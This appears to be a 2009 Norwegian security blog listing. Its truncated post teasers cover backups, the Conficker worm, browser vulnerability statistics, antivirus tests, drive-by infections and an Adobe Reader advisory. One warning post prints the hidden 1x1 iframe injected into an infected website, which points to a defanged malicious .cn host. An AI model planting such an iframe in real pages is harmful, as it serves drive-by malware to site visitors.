Hvorfor backup?
Det opplagte er at når harddisken ryker, så har du i allefall tatt vare på dokumenter, bilder etc. som du anser som verdifull. Problemet er kanskje at de fleste ikke tenker på dette - overhode. Eller, man tenker på det i ny og ne men får aldri gjort noe med det - før man sitter der og irriterer seg fordi harddisken krasjet.
Nå finnes det andre gode grunner til å ta backup også - virus.
Virus eller malware har i bunn og grunn ikke vært særlig skadelig med tanke på tap av
Den rimelig kjente ormen Conficker var programmert til å endre seg 1.april. Noen av endringene var kjent (bla. generering av 50 000 domenenavn). Hva den nye varianten egentlig vil gjøre er imidlertid ikke helt kjent men det som er helt opplagt er at det er et botnett som er bygd opp med anslagsvis 10 mill pc'er.
Selv om vi skal ta denne type trusler alvorlige, så er det vel slik at denne type ting heller ikke er fredet for spøk - spesielt 1.april
Samtidig så var det en liten motreaksjo
Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.
Javascript-injeksjonen, som er lagt inn på siden, henter info fra:
<iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1
height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>
Via redirect :
hxxp://vpsspeedi
En rapport fra Secunia som tar for seg bla. sårbarheter i nettlesere i 2008, kommer Opera godt ut i motsetning til Firefox. Hvor alvorlige disse sårbarhetene er, nevnes ikke i rapporten. Sårbarhetene knyttet til Firefox, kan lese her: http://www.mozilla.org/security/announce/.
Operas endringslogg: http://www.opera.com/docs/changelogs/windows/
Ser vi på sårbarheter knyttet til plug-in, er ActiveX (som IE bruker) fortsatt den dominerende.
Kilde: Secuniarapport 2008
På tross av at Microsoft har patch for sårbarheten som Downadup/Conficker utnytter, er det millioner av pc'er som er infisert.
Når ormen har infisert en PC, vil Downadup genererer en liste med over 250 mulige domener -
listen endres daglig - velger ett, og deretter bruker ormen denne webadressen for å nå en
hacker-styrt server som det laster ned mer ondsinnet programvare på den kaprete datamaskinen.
I mars, har ormen 7750 domenenavn den kan bruke. Domenenavnene er tilfeldige tegn ut
En test gjennomført av SRI Malware Threat Center, viser at Avira og AVG kommer best ut når ny malware binærfiler blir testet mot antivirusprogrammene man finner på bla. Virustotal.
Intensjonen med testen var å finne ut hvilke sikkerhetsprogram som detekterte ny malware. Testen presiserer at de fleste antivirusprogrammer vil få deteksjoner mot truslene innen noen få dager(men det hjelper jo ikke der og da).
Topp 10:
1 91% AntiVir Avira
2 91% Sophos Labs
3 91% Grisoft Inc
4 90
I helga var både nettsidene til mpx.no og fotovideo.no infisert med trojanere. De som hadde antivirusprogram som detekterte dette, slapp å få pc'n full av badware.
Slike Drive-by infeksjoner har blitt ganske så vanlige og dette setter igjen fokus på at som pcbruker, er det meget viktig at man holder sine programmer oppdaterte. Vi snakker ikke bare om Windows og Antivirusprogram, men også om andre programmer som lett går i glemmeboka når man tenker på oppdatering - Adobe Reader, Java, Real Pl
En kritisk sårbarhet har blitt identifisert i Adobe Reader 9 og Acrobat 9 og tidligere versjoner. Dette sikkerhetsproblemet kan føre til at programmet krasjer og kan potensielt tillate en angriper å ta kontroll over det berørte systemet. Det er rapporter om at dette problemet blir utnyttet.
Adobe forventer å gjøre tilgjengelig en oppdatering for Adobe Reader 9 og Acrobat 9 11 mars 2009
Ref. http://www.adobe.com/support/security/advi.../apsa09-01.html
Skadelig PDF-filer som utnytter sårb
HW.no har testet Ad-Aware og Spybot og det kommer gjerne kommentarer på slik. At disse to programmene er såpass populære, må skyldes medieomtalen de får, for snakker vi om malwarefjerning, så er det ikke disse to programmene som bør benyttes - først.
Slik skulle kanskje artikkelen ha vært:
Hvorfor sammenligne to brødbokser når kjøleskapet kan friste med bedre kvalitet.
Det siktes til disse to programmene, Ad-Aware og Spybot. Når man er innom temaet malware/spyware, så blir disse t
